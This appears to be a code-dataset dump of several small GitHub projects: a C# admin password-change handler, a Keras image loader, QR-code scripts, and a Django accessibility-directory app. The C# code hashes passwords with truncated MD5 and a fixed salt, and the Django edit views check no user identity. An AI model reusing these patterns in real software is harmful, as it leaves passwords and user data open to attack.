\"n\", info = \"请填写完整的修改信息\" });\n }\n if (password1!=password2)\n {\n return Json(new { status = \"n\", info = \"两次输入的新密码不同,请重新输入\" });\n }\n if (password==password1)\n {\n return Json(new { status = \"n\", info = \"新密码不能与旧密码相同\" });\n }\n\n Model.Admin a = Session[\"admin\"] as Model.Admin;\n password += \"_GDKQ\";\n password = MD5.MD5Encrypt16(password);\n if (a.Password.ToLower()!=password.ToLower())\n {\n return Json(new { status = \"n\", info = \"原密码错误,请重新输入\" });\n }\n\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Admin aa = dal.Admin.SingleOrDefault(x=>x.ID==a.ID);\n if (aa==null)\n {\n return Json(new { status = \"n\", info = \"数据库没有该管理员\" });\n }\n password1 += \"_GDKQ\";\n password1 = MD5.MD5Encrypt16(password1);\n aa.Password = password1;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"修改成功\", NextUrl = \"/Login\" });\n }\n }\n}" } ]
40
NapsterInBlue/kneejerk_example
https://github.com/NapsterInBlue/kneejerk_example
9337d80f349962c4f925a5e0b6e663031563441b
79c5ed6627109f70c39a063ee2784bd303af4acf
eeab910370d11fb6d92f0010bd2d57f88980765a
refs/heads/master
2020-05-20T15:22:22.229937
2019-05-08T19:18:32
2019-05-08T19:18:32
185,642,730
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6306620240211487, "alphanum_fraction": 0.6689895391464233, "avg_line_length": 24, "blob_id": "796a24712dc508ff0b982d8c53c075bcfa6a5c0b", "content_id": "10659d0510149f68b888d91efdf379da8c997937", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 574, "license_type": "no_license", "max_line_length": 62, "num_lines": 23, "path": "/loader.py", "repo_name": "NapsterInBlue/kneejerk_example", "src_encoding": "UTF-8", "text": "from keras.preprocessing.image import ImageDataGenerator\n\n\nTRAIN_DIR = 'example/train'\nTEST_DIR = 'example/test'\nVAL_DIR = 'example/val'\n\ntrain_datagen = ImageDataGenerator(rescale=1./255)\nvalidation_datagen = ImageDataGenerator(rescale=1./255)\n\ntrain_generator = train_datagen.flow_from_directory(\n TRAIN_DIR,\n target_size=(200, 200),\n batch_size=2,\n class_mode='binary'\n )\n\nvalidation_generator = validation_datagen.flow_from_directory(\n VAL_DIR,\n target_size=(200, 200),\n batch_size=2,\n class_mode='binary'\n )" }, { "alpha_fraction": 0.7762237787246704, "alphanum_fraction": 0.7867133021354675, "avg_line_length": 30.77777862548828, "blob_id": "8a889d6442bbc967a2d018cbd1c4f3fbae2a12d5", "content_id": "c73e3115ee05693999aec1a88bc382d0191dd461", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 286, "license_type": "no_license", "max_line_length": 74, "num_lines": 9, "path": "/README.md", "repo_name": "NapsterInBlue/kneejerk_example", "src_encoding": "UTF-8", "text": "An example dataset to accompany the tutorial in the kneejerk docs, located\n[here](https://napsterinblue.github.io/kneejerk/tutorial.html)\n\n\n## To Follow Along\n\n1. Clone this repository to your local workstation\n2. Activate a virtual environment\n3. Run `pip install -r requirements.txt`\n" } ]
2
Ash-Hassan/QR-Code-Generate-Decode
https://github.com/Ash-Hassan/QR-Code-Generate-Decode
9554e24d4d8ba8e8d4f99414f4a451a8a76391f2
7e2b77a706c62c429b2b82782c980193c87950f6
d586b5b54186a2be172b177611b84c6b5faab4b6
refs/heads/main
2023-04-10T15:35:22.008524
2021-04-23T22:22:58
2021-04-23T22:22:58
361,018,372
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5672645568847656, "alphanum_fraction": 0.5874439477920532, "avg_line_length": 20, "blob_id": "60e2c6b5ad4389dc574d25cdda8f10c9fe43a253", "content_id": "5d8beae2f3c7e0adf856d8786fec436fede5a33a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 446, "license_type": "no_license", "max_line_length": 41, "num_lines": 20, "path": "/Read_QRCode.py", "repo_name": "Ash-Hassan/QR-Code-Generate-Decode", "src_encoding": "UTF-8", "text": "import cv2\r\nimport numpy as np\r\nimport pyzbar.pyzbar as pyzbar\r\n\r\n# Scan From VideoCamera\r\ncap = cv2.VideoCapture(0)\r\nwhile True:\r\n _, frame = cap.read()\r\n decodedObjects = pyzbar.decode(frame)\r\n for obj in decodedObjects:\r\n x = obj.data\r\n print('QRCode Data: ', obj.data)\r\n\r\n if len(decodedObjects) != 0:\r\n break\r\n\r\n cv2.imshow(\"Frame\", frame)\r\n key = cv2.waitKey(1)\r\n if key==27:\r\n break\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.7815126180648804, "alphanum_fraction": 0.7815126180648804, "avg_line_length": 58.5, "blob_id": "27bb9f1c9c024587756b410a768403ba1a44cfa6", "content_id": "271d7f38718b36d5de5f724a32ee3450bb2383eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 119, "license_type": "no_license", "max_line_length": 92, "num_lines": 2, "path": "/README.md", "repo_name": "Ash-Hassan/QR-Code-Generate-Decode", "src_encoding": "UTF-8", "text": "# QR-Code-Generate-Decode\nThis repository contains a project by which one can create the QR code or decode a QR code.\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 22, "blob_id": "a20a019b4e43343dcee9a8372369b0222908cc4b", "content_id": "41c4b7ee338360675a9c02537c26f64879f6806c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 43, "num_lines": 8, "path": "/QRCode_Generator.py", "repo_name": "Ash-Hassan/QR-Code-Generate-Decode", "src_encoding": "UTF-8", "text": "import pyqrcode as df\r\nimport png\r\n\r\ninpp = 'Msg Inside QR Code'\r\na = df.create(inpp)\r\nnam = input('Enter Name Of File To Save: ')\r\na.png(nam+'.png')\r\nprint('QR Code Generated Successfully')" } ]
3
ronyjacobson/to-get-there-server
https://github.com/ronyjacobson/to-get-there-server
934c88db6e3e311688542ab20920158035a66251
b93f124ea4dbafbbac495c5d4c961e96dc2402e5
16268874d2924e6202e22613e896f7b3fb00d0e2
refs/heads/master
2021-01-13T14:20:35.204924
2015-07-21T10:06:22
2015-07-21T10:06:22
39,396,871
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6038781404495239, "alphanum_fraction": 0.6038781404495239, "avg_line_length": 22.322580337524414, "blob_id": "85a5a58110ccf70a73b7f459e1143a29d38eb74b", "content_id": "298d51f9df976e105c8655bbb88894562bd6e759", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 722, "license_type": "no_license", "max_line_length": 80, "num_lines": 31, "path": "/togetthereApp/forms.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "from django import forms\nfrom django.forms import ModelForm\nfrom .models import *\n\nclass UserForm(ModelForm):\n class Meta:\n model = User\n fields = ['facebook_id', 'first_name', 'last_name','email', 'birthday']\n\n\n\nclass SPForm(ModelForm):\n class Meta:\n model = SP\n fields = ['name', 'desc', 'category', 'longitude',\n 'latitude', 'phone', 'discount', 'website']\n\n\nclass AddressForm(ModelForm):\n class Meta:\n model = Address\n fields = ['street_num', 'street', 'city']\n\n\n#class EditSPForm(ModelForm):\n#class RankSPForm(ModelForm):\n\nclass AddReviewForm(ModelForm):\n class Meta:\n model = Review\n fields = ['title', 'content', 'user']" }, { "alpha_fraction": 0.6080798506736755, "alphanum_fraction": 0.6135522127151489, "avg_line_length": 31.025774002075195, "blob_id": "18f3c9b5d461cbd608864387c9008ead1dfa03af", "content_id": "de87962ff68f5c0977e41ec1f571e91a9cdc83aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6213, "license_type": "no_license", "max_line_length": 105, "num_lines": 194, "path": "/togetthereApp/models.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "from django.db import models\nimport datetime\n\n# Change your models (in models.py).\n# Run python manage.py makemigrations <App Name> to create migrations for those changes\n# Run python manage.py migrate to apply those changes to the database.\n\n\n\nclass User(models.Model):\n facebook_id = models.CharField(max_length=30, blank = True)\n first_name = models.CharField(max_length=35, db_index=True)\n last_name = models.CharField(max_length=35, db_index=True, blank = True)\n email = models.EmailField(db_index=True, blank = True)\n birthday = models.DateField(blank = True)\n created = models.DateTimeField(auto_now_add=True)\n\n # bday = datetime.datetime(year, month, day)\n # user = User(facebook_id = '', first_name= '', last_name= '', email = '', birthday=bday)\n\n def age(self):\n return (datetime.datetime.now().date() - self.birthday).days / 365\n\n def __unicode__(self):\n return self.first_name +\" \"+ self.last_name\n\n def as_json(self):\n return dict(\n id = self.pk,\n facebook_id = self.facebook_id,\n first_name = self.first_name,\n last_name = self.last_name,\n full_name = self.first_name +\" \"+ self.last_name,\n email = self.email,\n age = self.age(),\n birthday = self.birthday.isoformat(),\n created = self.created.isoformat())\n\n\n\nclass City(models.Model):\n city_name = models.CharField(max_length=50, db_index=True, unique=True)\n\n def __unicode__(self):\n return self.city_name\n\n def as_json(self):\n return dict(\n id = self.pk,\n city_name = self.city_name)\n\n\n\nclass Street(models.Model):\n city = models.ForeignKey(City)\n street_name = models.CharField(max_length=50, db_index=True)\n\n class Meta:\n unique_together = ((\"city\", \"street_name\"),)\n\n def __unicode__(self):\n return self.street_name\n\n def as_json(self):\n \n return dict(\n id = self.pk,\n street_name = self.street_name,\n city = self.city.city_name)\n\n\nclass Address(models.Model):\n street_num = models.IntegerField()\n street = models.ForeignKey(Street)\n city = models.ForeignKey(City)\n\n def __unicode__(self):\n return self.street.street_name + ' ' + str(self.street_num) + ', ' + self.city.city_name\n\n def as_json(self):\n return dict(\n id = self.pk,\n street = self.street.street_name,\n streetNum = self.street_num,\n city = self.city.city_name)\n \n\nclass SP(models.Model):\n # CATEGORIES:\n MEDICAL = 'medical'\n RESTAURANTS = 'restaurants'\n SHOPPING = 'shopping'\n PUBLIC_SERVICES = 'public_services'\n TRANSPORTATION = 'transportation'\n HELP = 'help'\n\n CATEGORY_CHOICES = (\n (MEDICAL, 'Medical'),\n (RESTAURANTS, 'Restaurants'),\n (SHOPPING, 'Shopping'),\n (PUBLIC_SERVICES, 'Public Services'),\n (TRANSPORTATION, 'Transportation'),\n (HELP, 'Help'),\n )\n\n\n # Fields:\n sp_address = models.ForeignKey(Address)\n name = models.CharField(max_length=100, db_index=True)\n desc = models.CharField(max_length=225, blank = True)\n longitude = models.DecimalField(max_digits=7, decimal_places=7, db_index=True, blank=True, null=True)\n latitude = models.DecimalField(max_digits=7, decimal_places=7, db_index=True, blank=True, null=True)\n phone = models.CharField(max_length=13, db_index=True, blank = True)\n is_verified = models.BooleanField(default=False)\n discount = models.IntegerField(default=0, db_index=True, blank = True)\n category = models.CharField(max_length=45, choices=CATEGORY_CHOICES)\n created = models.DateTimeField(auto_now_add=True)\n website = models.URLField(blank = True)\n rank = models.BigIntegerField(default=0, blank=True)\n voters = models.IntegerField(default=0, blank=True)\n # Accessibility Fields\n toilets = models.BooleanField(default=False)\n elevator = models.BooleanField(default=False)\n entrance = models.BooleanField(default=False)\n facilities = models.BooleanField(default=False)\n parking = models.BooleanField(default=False)\n \"\"\"\n TODO: Add Accecability fileds:\n entrance : ramp, wideCoridors, wideEntrance\n facilities: allowServicePets, counters, fittingRooms: handbars, chair/bench\n Toilets: handicapToilets, handbars, accecible sink\n \"\"\"\n\n # Add Photos Support\n\n # Functions\n def address(self):\n return unicode(self.sp_address)\n\n def __unicode__(self):\n return self.name + ', ' + self.address()\n\n #Json Parsers\n def as_json(self, withReviews):\n addressText = unicode(self.address())\n\n response= dict(\n id = self.pk,\n name = self.name,\n desc = self.desc,\n address = addressText,\n longitude = self.longitude,\n latitude = self.latitude,\n phone = self.phone,\n is_verified =self.is_verified,\n discount = self.discount,\n category =self.category,\n website = self.website,\n toilets= self.toilets,\n elevator = self.elevator,\n entrance = self.entrance,\n facilities = self.facilities,\n parking =self.parking,\n )\n\n if (withReviews):\n reviews = self.review_set.all()\n reviewsList = list()\n for review in reviews:\n reviewsList.append(review.as_json())\n print reviewsList\n response['reviews'] = reviewsList\n\n return response\n\nclass Review(models.Model):\n title = models.CharField(max_length=225)\n content = models.TextField(blank = True)\n likes = models.IntegerField(default=0, blank= True, db_index=True)\n sp = models.ForeignKey(SP)\n user = models.ForeignKey(User)\n created = models.DateTimeField(auto_now_add=True)\n\n def __unicode__(self):\n return self.title\n\n def as_json(self):\n return dict(\n id = self.pk,\n title = self.title,\n content = self.content,\n likes = self.likes,\n created = self.created.isoformat(),\n user = self.user.as_json())\n" }, { "alpha_fraction": 0.5268924236297607, "alphanum_fraction": 0.5318725109100342, "avg_line_length": 24.743589401245117, "blob_id": "2eed4850aaa75236646a4acb167e92295c9f1035", "content_id": "de95b58b10ec4806858984f8c155aa9f61d82e57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1004, "license_type": "no_license", "max_line_length": 53, "num_lines": 39, "path": "/togetthereApp/migrations/0002_auto_20150523_1910.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('togetthereApp', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='sp',\n name='elevator',\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name='sp',\n name='entrance',\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name='sp',\n name='facilities',\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name='sp',\n name='parking',\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name='sp',\n name='toilets',\n field=models.BooleanField(default=False),\n ),\n ]\n" }, { "alpha_fraction": 0.5142180323600769, "alphanum_fraction": 0.5379146933555603, "avg_line_length": 27.066667556762695, "blob_id": "eb4bded364e209bc23dc2352ac189f0abdcb9325", "content_id": "9b5e0714e8266b3318db0f0811f35143da11364c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 422, "license_type": "no_license", "max_line_length": 59, "num_lines": 15, "path": "/Resources/streetSpliter.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "\n\nif __name__ == '__main__':\n\n with open(\"street.csv\", \"r\") as streets:\n \tcounter = 0\n \tfileCounter = 0\n \toutput= open('streets0.csv', 'w')\n \tfor line in streets:\n\t \tif counter == 1500:\n\t \t\tcounter = 0\n\t \t\tfileCounter = fileCounter + 1\n\t \t\toutput.close()\n\t \t\toutput= open('streets'+str(fileCounter)+'.csv', 'w')\n \toutput.write(line)\n \tcounter= counter +1\n streets.close()" }, { "alpha_fraction": 0.7005444765090942, "alphanum_fraction": 0.7023593187332153, "avg_line_length": 20.230770111083984, "blob_id": "14bc4bd288d273c84f5ccdbed7ba83c41e71ac95", "content_id": "dc793f1d2ba1a0641db2fce73bcee54331b1fa65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 551, "license_type": "no_license", "max_line_length": 46, "num_lines": 26, "path": "/togetthereApp/admin.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\nfrom .models import *\n\n\nclass UserAdmin(admin.ModelAdmin):\n list_display = ('__unicode__', 'created')\n\n\nclass ReviewInLine(admin.StackedInline):\n model = Review\n extra = 1\n\n\nclass SPAdmin(admin.ModelAdmin):\n list_display = ('__unicode__', 'category')\n list_filter = ['category']\n inlines = [ReviewInLine]\n\nclass CityAdmin(admin.ModelAdmin):\n list_display = ('__unicode__')\n\nadmin.site.register(SP, SPAdmin)\nadmin.site.register(User,UserAdmin)\nadmin.site.register(City)\nadmin.site.register(Street)" }, { "alpha_fraction": 0.619210958480835, "alphanum_fraction": 0.6346483826637268, "avg_line_length": 37.043479919433594, "blob_id": "5948f8a2b0d023dc98b2900c9d006fef9f497a8f", "content_id": "3e85d607acc491e70b52dfb21d2cfc85f9139986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1749, "license_type": "no_license", "max_line_length": 113, "num_lines": 46, "path": "/togetthereApp/urls.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n # ex: /ToGetThere/\n\turl(r'^$', views.index, name='index'),\n\n # ex: /ToGetThere/android/city/\n url(r'^android/city/$', views.cities, name='view_cities'),\n\n # ex: /ToGetThere/android/city/1/streets/\n url(r'^android/city/(?P<city_id>[0-9]+)/streets/$', views.streetByCity, name='street_by_city'),\n\n # ex: /ToGetThere/android/category/medical/\n url(r'^android/category/(?P<category_id>medical|restaurants|shopping|public_services|transportation|help)/$',\n views.spByCategoryList, name='sp_by_category'),\n\n # ex: /ToGetThere/android/sp/1/\n url(r'^android/sp/(?P<sp_id>[0-9]+)/$', views.spView, name='spView'),\n\n # ex: /ToGetThere/android/sp/add/\n url(r'^android/sp/add/$', views.addSp, name='add_sp'),\n\n # ex: /ToGetThere/android/sp/1/rank/\n url(r'^android/sp/(?P<sp_id>[0-9]+)/rank/$', views.rankSp, name='rank_sp_view'),\n\n # ex: /ToGetThere/android/sp/1/edit/\n url(r'^android/sp/(?P<sp_id>[0-9]+)/edit/$', views.editSP, name='edit_sp_view'),\n\n # ex: /ToGetThere/android/sp/1/reviews/\n url(r'^android/sp/(?P<sp_id>[0-9]+)/reviews/$', views.spReviews, name='sp_reviews'),\n\n # ex: /ToGetThere/android/sp/1/addreview/\n url(r'^android/sp/(?P<sp_id>[0-9]+)/addreview/$', views.spAddReview, name='add_sp_review'),\n\n # ex: /ToGetThere/android/user/1/\n url(r'^android/user/(?P<user_id>[0-9]+)/$', views.userProfile, name='user_profile'),\n\n # ex: /ToGetThere/android/myprofile/1/\n url(r'^android/myprofile/(?P<user_id>[0-9]+)/$', views.userProfile, name='my_profile'),\n\n # ex: /ToGetThere/android/editprofile/1/\n url(r'^android/editprofile/(?P<user_id>[0-9]+)/$', views.editProfile, name='edit_profile'),\n\n]" }, { "alpha_fraction": 0.7194570302963257, "alphanum_fraction": 0.7194570302963257, "avg_line_length": 30.571428298950195, "blob_id": "2ce852c55ed265c896ba36802f79ffa0f708fec6", "content_id": "1667df0fcbb6fff4811fba0a6244576fb8884b94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 221, "license_type": "no_license", "max_line_length": 80, "num_lines": 7, "path": "/ToGetThere/urls.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n url(r'^ToGetThere/', include('togetthereApp.urls', namespace=\"ToGetThere\")),\n url(r'^admin/', include(admin.site.urls))\n]\n" }, { "alpha_fraction": 0.542029619216919, "alphanum_fraction": 0.549651563167572, "avg_line_length": 44.91999816894531, "blob_id": "f5ee65538f40332253ebc513d6f0d671ce68ecea", "content_id": "c9f1246e75397a632c173907d296ede8cff0179b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4592, "license_type": "no_license", "max_line_length": 262, "num_lines": 100, "path": "/togetthereApp/migrations/0001_initial.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Address',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('street_num', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='City',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('city_name', models.CharField(unique=True, max_length=50, db_index=True)),\n ],\n ),\n migrations.CreateModel(\n name='Review',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=225)),\n ('content', models.TextField(blank=True)),\n ('likes', models.IntegerField(default=0, db_index=True, blank=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='SP',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100, db_index=True)),\n ('desc', models.CharField(max_length=225, blank=True)),\n ('longitude', models.DecimalField(db_index=True, null=True, max_digits=7, decimal_places=7, blank=True)),\n ('latitude', models.DecimalField(db_index=True, null=True, max_digits=7, decimal_places=7, blank=True)),\n ('phone', models.CharField(db_index=True, max_length=13, blank=True)),\n ('is_verified', models.BooleanField(default=False)),\n ('discount', models.IntegerField(default=0, db_index=True, blank=True)),\n ('category', models.CharField(max_length=45, choices=[(b'medical', b'Medical'), (b'restaurants', b'Restaurants'), (b'shopping', b'Shopping'), (b'public_services', b'Public Services'), (b'transportation', b'Transportation'), (b'help', b'Help')])),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('website', models.URLField(blank=True)),\n ('rank', models.BigIntegerField(default=0, blank=True)),\n ('voters', models.IntegerField(default=0, blank=True)),\n ('sp_address', models.ForeignKey(to='togetthereApp.Address')),\n ],\n ),\n migrations.CreateModel(\n name='Street',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('street_name', models.CharField(max_length=50, db_index=True)),\n ('city', models.ForeignKey(to='togetthereApp.City')),\n ],\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('facebook_id', models.CharField(max_length=30, blank=True)),\n ('first_name', models.CharField(max_length=35, db_index=True)),\n ('last_name', models.CharField(db_index=True, max_length=35, blank=True)),\n ('email', models.EmailField(db_index=True, max_length=254, blank=True)),\n ('birthday', models.DateField(blank=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.AddField(\n model_name='review',\n name='sp',\n field=models.ForeignKey(to='togetthereApp.SP'),\n ),\n migrations.AddField(\n model_name='review',\n name='user',\n field=models.ForeignKey(to='togetthereApp.User'),\n ),\n migrations.AddField(\n model_name='address',\n name='city',\n field=models.ForeignKey(to='togetthereApp.City'),\n ),\n migrations.AddField(\n model_name='address',\n name='street',\n field=models.ForeignKey(to='togetthereApp.Street'),\n ),\n migrations.AlterUniqueTogether(\n name='street',\n unique_together=set([('city', 'street_name')]),\n ),\n ]\n" }, { "alpha_fraction": 0.6087080240249634, "alphanum_fraction": 0.6156801581382751, "avg_line_length": 40.3470573425293, "blob_id": "ea99cf5310a5268ffe37fe8bfb375d26fc0b2042", "content_id": "ba6e7f1f0b477959d66758575b54011129fa520d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7028, "license_type": "no_license", "max_line_length": 134, "num_lines": 170, "path": "/togetthereApp/views.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "from django.http import *\nfrom .forms import *\nfrom django.shortcuts import get_object_or_404,get_list_or_404, render\nimport json\nfrom django.core.urlresolvers import reverse\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom togetthereApp import forms\n\nDEBUG = True\n\ndef index(request):\n return HttpResponse(\"Hello, world. You're at the ToGetThere index.\")\n\ndef spByCategoryList(request, category_id):\n sps = list(SP.objects.filter(category = category_id))\n results = [sp.as_json(False) for sp in sps]\n return HttpResponse(json.dumps(results, ensure_ascii=False), content_type=\"application/json\")\n\ndef spView(request, sp_id):\n sp = get_object_or_404(SP,pk=sp_id)\n return HttpResponse(json.dumps(sp.as_json(True), ensure_ascii=False), content_type=\"application/json\")\n\n\ndef addSp(request):\n if (request.method == 'GET') & (DEBUG):\n sp_form = SPForm()\n address_form = AddressForm()\n return render(request, 'ToGetThere/addSP.html', {\n 'address_form': address_form,\n 'sp_form':sp_form})\n elif request.method == 'POST':\n sp_form = SPForm(request.POST)\n address_form = AddressForm(request.POST)\n\n if (sp_form.is_valid() and address_form.is_valid()):\n name_from_form = sp_form.cleaned_data['name']\n desc_from_form = sp_form.cleaned_data['desc']\n category_from_form = sp_form.cleaned_data['category']\n lon_from_form = sp_form.cleaned_data['longitude']\n lat_from_form = sp_form.cleaned_data['latitude']\n phone_from_form = sp_form.cleaned_data['phone']\n discount_from_form = sp_form.cleaned_data['discount']\n website_from_form = sp_form.cleaned_data['website']\n city_from_form = address_form.cleaned_data['city']\n street_from_form = address_form.cleaned_data['street']\n streetnum_from_form = address_form.cleaned_data['street_num']\n if (street_from_form.city.pk != city_from_form.pk):\n raise Http404('Street does not match city')\n return\n\n\n formAddress, created = Address.objects.get_or_create(\n street_num= streetnum_from_form,\n street= street_from_form,\n city = city_from_form)\n\n formsp = SP.objects.filter(name= name_from_form, sp_address=formAddress.pk)\n if not formsp.exists():\n formsp = SP.objects.create(\n name= name_from_form,\n desc= desc_from_form,\n sp_address=formAddress,\n longitude=lon_from_form,\n latitude=lat_from_form,\n phone=phone_from_form,\n discount= discount_from_form,\n category=category_from_form,\n website=website_from_form)\n return HttpResponseRedirect(reverse('ToGetThere:spView', args=(formsp.pk,)))\n \n # SP exists: redirect to update\n else:\n\n return HttpResponseRedirect(reverse('ToGetThere:spView', args=(formsp[0].pk,)))\n \n else:\n raise Http404(str(sp_form.errors) + '\\n' + str(address_form.errors) + '\\n')\n\n\n#TODO\ndef rankSp(request, sp_id):\n reviews = get_list_or_404(Review, sp=sp_id)\n results = [rev.as_json() for rev in reviews]\n return HttpResponse(json.dumps(results, ensure_ascii=False), content_type=\"application/json\")\n \n\n\ndef spReviews(request, sp_id):\n reviews = get_list_or_404(Review, sp=sp_id)\n results = [rev.as_json() for rev in reviews]\n return HttpResponse(json.dumps(results, ensure_ascii=False), content_type=\"application/json\")\n\ndef spAddReview(request, sp_id):\n\n if (request.method == 'GET') & (DEBUG):\n form = AddReviewForm()\n return render(request, 'ToGetThere/addReview.html', {'form': form,})\n elif request.method == 'POST':\n form = AddReviewForm(request.POST)\n if form.is_valid():\n formTitle = form.cleaned_data['title']\n formContent = form.cleaned_data['content']\n formUser = form.cleaned_data['user']\n formSp = SP.objects.get(pk = sp_id)\n review = Review(title = formTitle, content= formContent, user = formUser, sp= formSp)\n review.save()\n return HttpResponseRedirect(reverse('ToGetThere:spView', args=(review.sp.pk,)))\n else:\n raise Http404(form.errors)\n\n\ndef editSP(request, sp_id):\n sp = get_object_or_404(SP, pk = sp_id)\n address = sp.sp_address\n if (request.method == 'GET') & (DEBUG):\n sp_form = SPForm(instance= sp)\n address_form = AddressForm(instance= address)\n return render(request, 'ToGetThere/addSP.html', {\n 'address_form': address_form,\n 'sp_form':sp_form})\n\n elif (request.method == 'POST'):\n sp_form = SPForm(request.POST, instance= sp)\n address_form = AddressForm(request.POST, instance= address)\n\n if (sp_form.is_valid() and address_form.is_valid()):\n city_from_form = address_form.cleaned_data['city']\n street_from_form = address_form.cleaned_data['street']\n if (street_from_form.city.pk != city_from_form.pk):\n raise Http404('Street does not match city, street: '+ str(street_from_form.city.pk)+', city: '+ str(city_from_form.pk))\n return\n\n editedSP = sp_form.save(commit = False)\n editedAddress = address_form.save()\n editedSP.sp_address = editedAddress\n editedSP.save()\n return HttpResponseRedirect(reverse('ToGetThere:spView', args=(editedSP.pk,)))\n\n else:\n raise Http404(str(sp_form.errors) + '\\n' + str(address_form.errors) + '\\n')\n\ndef userProfile(request, user_id):\n user = get_object_or_404(User,pk=user_id)\n return HttpResponse(json.dumps(user.as_json(), ensure_ascii=False), content_type=\"application/json\")\n\ndef editProfile(request, user_id):\n user = get_object_or_404(User, pk = user_id)\n if (request.method == 'GET') & (DEBUG):\n user_form = UserForm(instance= user)\n return render(request, 'ToGetThere/editProfile.html', {\n 'user_form': user_form})\n\n elif (request.method == 'POST'):\n user_form = UserForm(request.POST, instance= user)\n if user_form.is_valid():\n editedUser = user_form.save()\n return HttpResponseRedirect(reverse('ToGetThere:user_profile', args=(editedUser.pk,)))\n\n else:\n raise Http404(str(user_form.errors))\n\ndef streetByCity(request, city_id):\n streets = get_list_or_404(Street, city_id = city_id)\n results = [street.as_json() for street in streets]\n return HttpResponse(json.dumps(results, ensure_ascii=False), content_type=\"application/json\")\n\ndef cities(request):\n cities = get_list_or_404(City)\n results = [city.as_json() for city in cities]\n return HttpResponse(json.dumps(results, ensure_ascii=False), content_type=\"application/json\")" } ]
9
kalambet/mno
https://github.com/kalambet/mno
debbe138a84ab99ad90a7ad5747fc3799e60944f
45bddda29ddbffa84bea42fe9bbcf0b0ac479baa
a632e4000f764be6de7879b8a98b44f97c459938
refs/heads/master
2020-08-30T11:12:54.247308
2019-07-22T09:52:21
2019-07-22T09:52:33
218,362,405
1
1
null
2019-10-29T19:03:07
2019-10-21T14:37:11
2019-07-22T09:52:56
null
